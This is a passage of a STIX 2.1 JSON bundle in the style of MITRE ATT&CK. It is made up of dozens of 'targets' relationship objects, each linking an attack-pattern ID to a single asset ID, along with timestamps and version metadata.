"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ab91302-ab0a-4d16-91c2-e232125829d7", "created": "2024-07-01T10:37:15.834429", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834431", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f4dda8c-7358-4466-918c-42de380b1a5d", "created": "2024-07-01T10:37:15.834439", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834441", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c97b0f9-1ed2-422e-bab1-c34b05f098c6", "created": "2024-07-01T10:37:15.834449", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834451", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb9ac701-7224-4df1-935f-629e3a8eb0fa", "created": "2024-07-01T10:37:15.834458", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834460", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a48309b-d7da-47df-a5c9-eb579f2eeb8a", "created": "2024-07-01T10:37:15.834468", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834470", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ccee227e-904f-4fcf-8e3d-1e8f22afee12", "created": "2024-07-01T10:37:15.834478", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834480", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d54ea53d-0386-4e27-b4ec-68e3f87df817", "created": "2024-07-01T10:37:15.834488", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834490", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--304d12ac-bace-482e-91c3-2a0ecb9884cb", "created": "2024-07-01T10:37:15.834497", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834499", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80feb34d-c26b-42e0-ad68-d6fe2c2922a6", "created": "2024-07-01T10:37:15.834507", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834509", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78332f2f-6633-4e8d-bf0d-b0705fd4c01d", "created": "2024-07-01T10:37:15.834517", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834519", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25e23f7e-ad22-46b0-8ee9-0415ec1130ca", "created": "2024-07-01T10:37:15.834526", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834528", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22d4508b-6e8a-4836-b150-892e13d70b26", "created": "2024-07-01T10:37:15.834536", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834538", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a00db12a-e6fc-43e4-8784-b7a8040d1679", "created": "2024-07-01T10:37:15.834546", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834548", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a1cde8b-c2ad-4402-9407-0c19893327a3", "created": "2024-07-01T10:37:15.834556", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834558", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a1b76d5-4d6f-4954-b5d4-8760ecd061b7", "created": "2024-07-01T10:37:15.834565", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834567", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bfebf007-0e26-4f3d-88d5-f2e6d1b72f8a", "created": "2024-07-01T10:37:15.834575", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834577", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a58ac3d7-25f0-4b44-ac2d-f548ac537238", "created": "2024-07-01T10:37:15.834585", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834587", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32d70113-8027-475b-b559-a2c48a9024f3", "created": "2024-07-01T10:37:15.834594", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834597", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--00d9bf5d-81c5-4e96-aa19-21a6eb736dac", "created": "2024-07-01T10:37:15.834604", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834607", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5832609e-703c-4523-b22f-ffb253729942", "created": "2024-07-01T10:37:15.834614", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834616", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--591c72fe-d59a-402e-afed-0d1d30e2c1ee", "created": "2024-07-01T10:37:15.834624", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834626", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d6209e71-3ff9-4e95-ac59-b0648c8ffe88", "created": "2024-07-01T10:37:15.834633", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834636", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ae5f75f-8287-46a2-a21a-bba14b3ca768", "created": "2024-07-01T10:37:15.834643", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834645", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9805341d-ed24-4ede-9267-8f1634223986", "created": "2024-07-01T10:37:15.834653", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834655", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0108fae7-6a1a-4afc-84fa-053e795b63c8", "created": "2024-07-01T10:37:15.834663", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834665", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ac15d069-1d06-4da2-b16d-d81ed6cf4b0f", "created": "2024-07-01T10:37:15.834672", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834674", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53a89f06-b481-495f-9ec4-bdc76c240260", "created": "2024-07-01T10:37:15.834682", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834684", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1e0e196-21cf-4935-b19a-a3714ec2c896", "created": "2024-07-01T10:37:15.834691", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834694", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92687637-030c-41a2-a2ff-dd4131835555", "created": "2024-07-01T10:37:15.834701", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834703", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09e8f32f-5887-48c0-b6ac-3b5ff6ee90f2", "created": "2024-07-01T10:37:15.834711", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834713", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--011d8534-6b11-405b-8b1b-10789eddebe7", "created": "2024-07-01T10:37:15.834721", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834723", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b1bf2246-8e89-41a4-bdef-861edc175d64", "created": "2024-07-01T10:37:15.834731", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834733", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8dc095f3-1473-408d-a4c5-ff6a2419b740", "created": "2024-07-01T10:37:15.834740", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834742", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d54324d1-e074-45b7-a888-18c36cbc20d0", "created": "2024-07-01T10:37:15.834750", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834752", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07bfca2c-bb1f-46f9-a051-198e98364991", "created": "2024-07-01T10:37:15.834760", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834762", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28665c5d-a465-43d8-a343-e13881190fca", "created": "2024-07-01T10:37:15.834770", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834772", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d33bdfea-6e21-46e7-bec1-3dd7b65de413", "created": "2024-07-01T10:37:15.834779", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834781", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24523f79-ee1d-4b07-9cb5-0fec0ff670e3", "created": "2024-07-01T10:37:15.834789", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834791", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d77f5d6-806a-4767-a923-eee282d9c83c", "created": "2024-07-01T10:37:15.834799", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834801", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--db67ff38-7dae-4e9f-890a-ac7d8142221d", "created": "2024-07-01T10:37:15.834808", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834810", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e63ada6c-84de-4e09-9a0b-b84aea4a09a0", "created": "2024-07-01T10:37:15.834818", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834820", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": 